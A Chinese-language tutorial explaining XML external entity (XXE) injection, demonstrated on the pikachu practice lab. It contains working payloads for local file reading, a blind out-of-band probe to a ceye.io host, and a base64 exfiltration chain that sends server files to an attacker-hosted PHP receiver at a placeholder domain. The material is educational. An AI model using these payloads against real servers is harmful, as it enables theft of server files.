XXE漏洞知识整理

XXE -"xml external entity injection"
既"xml外部实体注入漏洞"
攻击者可以注入XML实体内容，并由服务器解析执行，从而引发问题。
该漏洞通常被用来读取服务器本地文件。

0x00 什么是XML

XML 指可扩展标记语言（EXtensible Markup Language）
XML 是一种标记语言，很类似 HTML
XML 的设计宗旨是传输数据，而非显示数据
XML 标签没有被预定义。您需要自行定义标签。
XML 被设计为具有自我描述性。
XML 是 W3C 的推荐标准

XML与HTML的区别：
XML 不是 HTML 的替代。
XML 和 HTML 为不同的目的而设计：
XML 被设计为传输和存储数据，其焦点是数据的内容。
HTML 被设计用来显示数据，其焦点是数据的外观。
HTML 旨在显示信息，而 XML 旨在传输信息。

XML的结构:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!--第一部分是 XML 声明。它定义 XML 的版本 (1.0) 和所使用的编码 (ISO-8859-1)-->

<!DOCTYPE note[ 
<!--定义此文档是note类型的文档-->
<!ENTITY entity-name SYSTEM "URI/URL">
<!--外部实体声明-->
]>
<!--第二部分：文档类型定义 DTD-->

<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
<!--第三部分：文档元素-->

DTD实体（XXE攻击关键）：
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。实体可在内部或者外部声明。
内部引用：<!ENTITY 实体名称 "实体的值">
外部引用：<!ENTITY 实体名称 SYSTEM "URI/URL">

实体又分为一般实体和参数实体
1，一般实体的声明语法:<!ENTITY 实体名 "实体内容“>
引用实体的方式：&实体名；
2，参数实体只能在DTD中使用，参数实体的声明格式： <!ENTITY % 实体名 "实体内容">
引用实体的方式：%实体名；

0x01 带回显的XXE攻击 (Normal XXE)

使用靶场：pikachu
查看一下关键代码：

$html='';
//考虑到目前很多版本里面libxml的版本都>=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析
if(isset($_POST['submit']) and $_POST['xml'] != null){
   $xml =$_POST['xml'];
   $data = @simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
   if($data){
       $html.="<pre>{$data}</pre>";
   }else{
       $html.="<p>XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?</p>";
   }
}

simplexml_load_string() 函数转换形式良好的 XML 字符串为 SimpleXMLElement 对象，同时开启了外部实体解析，没有做任何过滤。
那么通过payload：

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker SYSTEM "file:///c:/windows/win.ini">
]>
<name>&hacker;</name>

便可实现任意文件读取

image.png

0x02 无回显的XXE攻击 (Blind XXE)

修改一下代码，不回显数据：

$html='';
//考虑到目前很多版本里面libxml的版本都>=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析
if(isset($_POST['submit']) and $_POST['xml'] != null){
   $xml =$_POST['xml'];
   $data = @simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
   if($data){
       // $html.="<pre>{$data}</pre>";
       $html.="<pre>解析成功</pre>"
   }else{
       $html.="<p>XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?</p>";
   }
}

构造payload让服务器发送请求到我们的服务器确认存在xxe漏洞，过程服务器端可能会出错，但服务器确实是发送了请求。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY % remote SYSTEM "http://xxxx.ceye.io/blind_xxe_test">
%remote;
]>
<name>test</name>

0x03 无回显的XXE攻击 (Blind OOB XXE)

若想将%参数的内容直接放到url里面会报错的，想使用该方法就需要引用外部实体
首先在攻击服务器上写下blind_xxe.php文件：

<?php
file_put_contents('1.txt',$_GET['yy']);
?>

写入外部实体文件，test.xml:

<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://xxx.com/blind_xxe.php?yy=%file;'>">

然后在靶机提交一下payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % remote SYSTEM "http://xxx.com/test.xml">
%remote;
%all;
%send;
]>
<name>test</name>

注意先引用%all后再引用%send,test.xml中单引号中的‘%’号需要进行实体编码，这样就可以在无回显的情况下读取服务器文件了